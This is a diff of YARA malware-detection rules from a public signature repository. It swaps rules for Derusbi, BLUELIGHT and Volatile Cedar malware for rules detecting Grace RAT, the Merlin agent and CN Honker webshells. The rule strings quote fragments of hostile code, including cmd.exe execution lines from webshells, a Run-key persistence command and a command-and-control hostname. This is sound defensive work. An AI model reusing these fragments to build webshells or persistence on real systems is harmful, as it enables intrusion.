-		$keylogger_component15 = "[WIN]"
-		$keylogger_component16 = "[NUM *]"
-		$keylogger_component17 = "[NUM +]"
-		$keylogger_component18 = "[NUM ,]"
-		$keylogger_component19 = "[NUM -]"
-		$keylogger_component20 = "[NUM .]"
-		$keylogger_component21 = "NUM /]"
-		$keylogger_component22 = "[NUMLOCK]"
-		$keylogger_component23 = "[SCROLLLOCK]"
-		$keylogger_component24 = "Time: "
-		$keylogger_component25 = "Window: "
-		$keylogger_component26 = "CAPSLOCK+"
-		$keylogger_component27 = "SHIFT+"
-		$keylogger_component28 = "CTRL+"
-		$keylogger_component29 = "ALT+"
+		$s1 = "No key in args!" ascii fullword
+		$s2 = "Bad data file!" ascii fullword
+		$s3 = "Data file loaded. Running..." ascii
+		$op1 = { 48 8d 55 c8 4c 8d 3d ac 8f 00 00 45 33 c9 45 33 d2 4d 8b e7 44 21 0a 45 33 db 4c 8d 3d 16 ec ff ff }
+		$op2 = { 48 d3 e8 0f b6 c8 49 03 cb 49 81 c3 00 01 00 00 45 33 8c 8f a0 e4 00 00 41 83 fa 04 7c c7 41 ff c0 }
+		$op3 = { 48 83 c1 04 48 ff ca 89 41 1c 75 ef 03 f6 48 83 c3 20 48 ff cd 0f 85 77 ff ff ff }
 
 	condition:
-		$magic or ( all of ( $f* ) and 5 of ( $keylogger_component* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* ) or 27 of ( $keylogger_component* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Bluelight : INKYSQUID
+rule SIGNATURE_BASE_MAL_Grace_Dec22
 {
 	meta:
-		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
-		author = "threatintel@volexity.com"
-		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
-		date = "2021-04-23"
+		description = "Detects Grace (aka FlawedGrace and GraceWire) RAT"
+		author = "X__Junior"
+		id = "fc2214dc-f1e5-52d7-a9de-88709a03b04e"
+		date = "2022-12-13"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37_bluelight.yar#L114-L144"
+		reference = "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sysaid_cve_2023_47246.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7"
-		score = 75
+		logic_hash = "8276662dadfa2f8e07dd7882a60e55bd22ecf1f8f66a09940f16236598646560"
+		score = 70
 		quality = 85
-		tags = "INKYSQUID"
-		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
-		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = ""
+		hash1 = "a66df3454b8c13f1b92d8b2cf74f5bfcdedfbff41a5e4add62e15277d14dd169"
+		hash2 = "e113a8df3c4845365f924bacf10c00bcc5e17587a204b640852dafca6db20404"
 
 	strings:
-		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
-		$pdb2 = "Release\\bluelight.pdb"
-		$msg0 = "https://ipinfo.io" fullword
-		$msg1 = "country" fullword
-		$msg5 = "\"UserName\":\"" fullword
-		$msg7 = "\"ComName\":\"" fullword
-		$msg8 = "\"OS\":\"" fullword
-		$msg9 = "\"OnlineIP\":\"" fullword
-		$msg10 = "\"LocalIP\":\"" fullword
-		$msg11 = "\"Time\":\"" fullword
-		$msg12 = "\"Compiled\":\"" fullword
-		$msg13 = "\"Process Level\":\"" fullword
-		$msg14 = "\"AntiVirus\":\"" fullword
-		$msg15 = "\"VM\":\"" fullword
+		$sa1 = "Grace finalized, no more library calls allowed." ascii
+		$sa2 = "Socket forcibly closed due to no response to DISCONNECT signal from other side, worker id(%d)" ascii
+		$sa3 = "AVWireCleanupThread" ascii
+		$sa4 = "AVTunnelClientDirectIO" ascii
+		$sa5 = "AVGraceTunnelWriteThread" ascii
+		$sa6 = "AVGraceTunnelClientDirectIO" ascii
 
 	condition:
-		any of ( $pdb* ) or all of ( $msg* )
+		2 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Confluence_RCE_CVE_2021_26084_Sep21 : LOG CVE_2021_26084
+rule SIGNATURE_BASE_Merlinagent
 {
 	meta:
-		description = "Detects exploitation attempts against Confluence servers abusing a RCE reported as CVE-2021-26084"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bbf98ce4-d32b-541a-b727-bc35c9aaef53"
-		date = "2021-09-01"
+		description = "Detects Merlin agent"
+		author = "Hilko Bengen"
+		id = "92346a3f-dce4-58db-893b-b7797fa20029"
+		date = "2017-12-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_26084_confluence_log.yar#L2-L24"
+		reference = "https://github.com/Ne0nd0g/merlin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_merlin_agent.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04542570b4814efde3d96ba5be8b5f9fd6e3c51be09f0e8a1c4eba45bfd8f5ff"
-		score = 55
-		quality = 60
-		tags = "LOG, CVE-2021-26084"
+		logic_hash = "21743230556cc11a78942de30be476ad8e73731bbda9a4feb83bd8140a703d01"
+		score = 75
+		quality = 85
+		tags = ""
+		filetype = "pe, elf, mach"
 
 	strings:
-		$xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii wide
-		$xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]"
-		$xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1"
-		$sa1 = "GET /pages/doenterpagevariables.action"
-		$sb1 = "%5c%75%30%30%32%37"
-		$sb2 = "\\u0027"
-		$sc1 = " ERROR "
-		$sc2 = " | userName: anonymous | action: createpage-entervariables"
-		$re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/
+		$x1 = "Command output:\x0d\x0a\x0d\x0a%s"
+		$x2 = "[-]Connecting to web server at %s to update agent configuration information."
+		$x3 = "[-]%d out of %d total failed checkins"
+		$x4 = "[!}Unknown AgentControl message type received %s"
+		$x5 = "[-]Received Agent Kill Message"
+		$x6 = "[-]Received Server OK, doing nothing"
+		$x7 = "[!]There was an error with the HTTP client while performing a POST:"
+		$x8 = "[-]Sleeping for %s at %s"
+		$s1 = "Executing command %s %s %s"
+		$s2 = "[+]Host Information:"
+		$s3 = "\tHostname: %s"
+		$s4 = "\tPlatform: %s"
+		$s5 = "\tUser GUID: %s"
 
 	condition:
-		1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 )
+		1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Derusbi_Kernel : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Jul17_2C : FILE
 {
 	meta:
-		description = "Derusbi Driver version"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
-		id = "a60ab93a-e2be-53ee-a7da-56c763bc5533"
-		date = "2015-12-09"
+		description = "Unspecified Malware - CN relation"
+		author = "Florian Roth (Nextron Systems)"
+		id = "91e760e8-7460-54af-a794-0b41a4b19760"
+		date = "2017-07-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L9-L22"
+		reference = "https://goo.gl/CX3KaY"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unspecified_malware.yar#L3-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5a0ce0b0116c3a84d52c22369dbf3cb9cf3ad8f8a05cea5565ba9bb99255fab"
+		logic_hash = "a078b96ea15b287c8aed960741865aeac356ec8650eac71b8e28f2f1924ec956"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5"
 
 	strings:
-		$token1 = "$$$--Hello"
-		$token2 = "Wrod--$$$"
-		$class = ".?AVPCC_BASEMOD@@"
+		$x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide
+		$x2 = "freenow.chickenkiller.com" fullword ascii
+		$x3 = "\\Release\\PhantomNet-SSL.pdb" ascii
+		$s1 = "SELECT * FROM AntiVirusProduct" fullword ascii
+		$s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii
+		$s3 = "Proxy-Authenticate: Basic" fullword ascii
+		$s4 = "Proxy-Authenticate: NTLM" fullword ascii
+		$s5 = "Root\\SecurityCenter2" fullword wide
+		$s6 = "aaabbbcccddd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $token1 and $token2 and $class
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Derusbi_Linux : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php5 : FILE
 {
 	meta:
-		description = "Derusbi Server Linux version"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
-		id = "2b33afb5-be87-5d41-b05e-b99d0c1d8ed9"
-		date = "2015-12-09"
+		description = "Webshell from CN Honker Pentest Toolset - file php5.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ee063c4c-af06-520f-acfe-fba758b84d3c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L24-L39"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68d5af17b33d1aa0388516e5d2a1ad29c22dc04451e232dfbdf1ef0714baeb10"
-		score = 75
+		hash = "0fd91b6ad400a857a6a65c8132c39e6a16712f19"
+		logic_hash = "e882f115a67fe31ece1a81e1a2770b46370a92ac3aa23e348a12cdb5735e8a0e"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$PS1 = "PS1=RK# \\u@\\h:\\w \\$"
-		$cmd = "unset LS_OPTIONS;uname -a"
-		$pname = "[diskio]"
-		$rkfile = "/tmp/.secure"
-		$ELF = "\x7fELF"
+		$s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii
+		$s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"<b>\".$" ascii
 
 	condition:
-		$ELF at 0 and $PS1 and $cmd and $pname and $rkfile
+		uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Derusbi_Kernel_Driver_WD_UDFS : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Test3693 : FILE
 {
 	meta:
-		description = "Detects Derusbi Kernel Driver"
+		description = "Webshell from CN Honker Pentest Toolset - file test3693.war"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51d80d19-f87f-5b09-ac49-08ebcb464013"
-		date = "2015-12-15"
+		id = "58fe4445-b2e1-5d5f-8c46-39c6ae78f845"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L48-L79"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bea8dafbef01ca8cf747a1f24804c0fb7868db09ce8091ff93c9c5d67d95ca3e"
-		score = 80
+		hash = "246d629ae3ad980b5bfe7e941fe90b855155dbfc"
+		logic_hash = "a10618d54fb7adbbd89a10f2e1ac067ccd1832140bcaf3b92394ebe7323f2d1e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
-		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
-		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
-		hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
 
 	strings:
-		$x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
-		$x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
-		$x3 = "\\??\\pipe\\usbpcex%d" fullword wide
-		$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
-		$x5 = "$$$--Hello" fullword ascii
-		$x6 = "Wrod--$$$" fullword ascii
-		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
-		$s2 = "Update.dll" fullword ascii
-		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
-		$s4 = "\\Driver\\nsiproxy" wide
-		$s5 = "HOST: %s" fullword ascii
+		$s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii
+		$s2 = "http://www.topronet.com </font>\",\" <font color=red> Thanks for your support - " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 2 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x4b50 and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Derusbi_Code_Signing_Cert : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Mycode12 : FILE
 {
 	meta:
-		description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
+		description = "Webshell from CN Honker Pentest Toolset - file mycode12.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d123fde9-0182-5232-a716-b76e8d9830c4"
-		date = "2015-12-15"
+		id = "2ce7368c-7565-5b32-94d1-c87023404c5b"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L81-L96"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dae976a4896a4f6b6a1b415582db84f3da5aac03bf4079f75e11c790dcf23900"
-		score = 60
+		hash = "64be8760be5ab5c2dcf829e3f87d3e50b1922f17"
+		logic_hash = "94cb0e414634af753db9ec0c63a3a34b4f9104e93e01d67cebab7b3a0c471198"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
-		$s2 = "XL Games Co.,Ltd.0" fullword ascii
-		$s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
+		$s1 = "<cfexecute name=\"cmd.exe\"" fullword ascii
+		$s2 = "<cfoutput>#cmd#</cfoutput>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_XOR_4Byte_Key : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Offlibrary : FILE
 {
 	meta:
-		description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
+		description = "Webshell from CN Honker Pentest Toolset - file offlibrary.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77850332-87ce-5ed3-bb09-88e91e5bb5f6"
-		date = "2015-12-15"
+		id = "c01f7c8b-a6bd-5094-9574-8cc853698607"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L98-L121"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61cbdac3fd9a486d85261234698f33aa04d505b32dfec731de6fc61d103bf609"
-		score = 60
+		hash = "eb5275f99211106ae10a23b7e565d208a94c402b"
+		logic_hash = "ffec24bedfe0794e8f92da5067c41932339e61ec23d71a67ed4b634434cd10d6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
+		$s0 = "';$i=$g->query(\"SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING" ascii
+		$s12 = "if(jushRoot){var script=document.createElement('script');script.src=jushRoot+'ju" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
+		filesize < 1005KB and all of them
 }
-rule SIGNATURE_BASE_Derusbi_Backdoor_Mar17_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_Xl : FILE
 {
 	meta:
-		description = "Detects a variant of the Derusbi backdoor"
+		description = "Webshell from CN Honker Pentest Toolset - file xl.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c8838d6-b9c2-589e-b6a2-a8c7ad6f10cc"
-		date = "2017-03-03"
+		id = "5c8d1301-fe20-50e0-86ac-99a220cd4be1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L123-L143"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L76-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "068a8d5c7378c6cf9d0369374550cd34b54e9f913aa7512a6beb46395fc15b19"
-		score = 75
+		hash = "49c3d16ee970945367a7d6ae86b7ade7cb3b5447"
+		logic_hash = "b6683a24ad58a9444ec91f13e7da5db3e3e768afded09a23e1bbd0a0c23cf6b9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f87915f21dcc527981ebb6db3d332b5b341129b4af83524f59d7178e9d2a3a32"
 
 	strings:
-		$x1 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
-		$x2 = "c%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword wide
-		$x3 = "%Systemroot%\\Help\\perfc009.dat" fullword wide
-		$x4 = "rundll32.exe \"%s\", R32 %s" fullword wide
-		$x5 = "OfficeUt32.dll" fullword ascii
-		$x6 = "\\\\.\\pipe\\usb%so" fullword wide
-		$x7 = "\\\\.\\pipe\\usb%si" fullword wide
-		$x8 = "\\tmp1.dat" wide
+		$s0 = "<input name=\"DESTINATION\" value=\"" ascii
+		$s1 = "<CFFILE ACTION=\"Write\" FILE=\"#Form.path#\" OUTPUT=\"#Form.cmd#\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		uint16( 0 ) == 0x433c and filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_Explosive_EXE : APT FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Linux : FILE
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
-		author = "Check Point Software Technologies Inc."
-		id = "3a9fb6b2-2f19-5d70-81ed-a08c3b8b2d80"
-		date = "2023-12-05"
+		description = "Webshell from CN Honker Pentest Toolset - file linux.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8d94f1c5-2139-5d0d-8af9-9c30a0359910"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L1-L12"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L93-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77eb74586f5ef2878c0d283b925e6e066f704d00525303990cf5ea7988a6637d"
-		score = 75
+		hash = "78339abb4e2bb00fe8a012a0a5b7ffce305f4e06"
+		logic_hash = "2c6278acd123e0d41ed4f0f8f0da27d5de1ad56efb8102c9eae442838a0416d0"
+		score = 70
 		quality = 85
-		tags = "APT, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$DLD_S = "DLD-S:"
-		$DLD_E = "DLD-E:"
+		$s0 = "<form name=form1 action=exploit.php method=post>" fullword ascii
+		$s1 = "<title>Changing CHMOD Permissions Exploit " fullword ascii
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		uint16( 0 ) == 0x696c and filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_Explosion_Sample_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Interception3389_Get : FILE
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		description = "Webshell from CN Honker Pentest Toolset - file get.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcf28185-75a8-5c9f-9f60-edb8dc187e16"
-		date = "2015-04-03"
+		id = "b17a793f-ffb7-5cdc-ba21-b0e2f0d14490"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/5vYaNb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L14-L38"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L110-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c97693ecb36247bdb44ab3f12dfeae8be4d299bb"
-		logic_hash = "f559880c182cf8061d640f60f18fe607d88a1f22216d93ff1d0ece720bcc94a7"
+		hash = "ceb6306f6379c2c1634b5058e1894b43abcf0296"
+		logic_hash = "649e611c9d8948e60811af4209d737b3e797e6b42beba42439541ae543b062d6"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "REG ADD \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$s9 = "WinAutologon From Winlogon Reg" fullword ascii
-		$s10 = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0" fullword ascii
-		$s11 = "IE:Password-Protected sites" fullword ascii
-		$s12 = "\\his.sys" ascii
-		$s13 = "HTTP Password" fullword ascii
-		$s14 = "\\data.sys" ascii
-		$s15 = "EL$_RasDefaultCredentials#0" fullword wide
-		$s17 = "Office Outlook HTTP" fullword ascii
-		$s20 = "Hist :<b> %ws</b>  :%s </br></br>" fullword ascii
+		$s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii
+		$s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii
+		$s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_Explosion_Sample_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Nc_1 : FILE
 {
 	meta:
-		description = "Explosion/Explosive Malware - Volatile Cedar APT"
+		description = "Webshell from CN Honker Pentest Toolset - file 1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8be7ed50-0bfc-5302-b4fa-8817bf1750d7"
-		date = "2015-04-03"
+		id = "fe83df79-f7cb-50b8-bb34-9bfc5fbe3de2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/5vYaNb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L40-L57"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L128-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "62fe6e9e395f70dd632c70d5d154a16ff38dcd29"
-		logic_hash = "db7ead96e0a9b4cf5c5cc885eac421cc11988f60d03f94de5fe828899d115bf0"
+		hash = "51d83961171db000fe4476f36d703ef3de409676"
+		logic_hash = "80ea8f16d943a3775fe9999131272af9e7f1af60d413109e58ecdef036484760"
 		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "serverhelp.dll" fullword wide
-		$s1 = "Windows Help DLL" fullword wide
-		$s5 = "SetWinHoK" fullword ascii
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii
+		$s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D
+		filesize < 11KB and all of them
 }
-rule SIGNATURE_BASE_Explosion_Generic_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Blacksky : FILE
 {
 	meta:
-		description = "Generic Rule for Explosion/Explosive Malware - Volatile Cedar APT"
+		description = "Webshell from CN Honker Pentest Toolset - file php6.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc3721b6-c19e-5449-9962-2a6f844e49b4"
-		date = "2015-04-03"
+		id = "741bb4db-6296-5222-8480-1169a6f44fd8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L59-L88"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L145-L160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8b6e1e6aa838036989040dfbf4f6f3e347a717967deef740b35d1752b5c91da5"
+		hash = "a60a599c6c8b6a6c0d9da93201d116af257636d7"
+		logic_hash = "3b92f63f536361d8ba0cde853fb546f271abdec3a7c1d44688a42610f5f90c57"
 		score = 70
 		quality = 85
 		tags = "FILE"
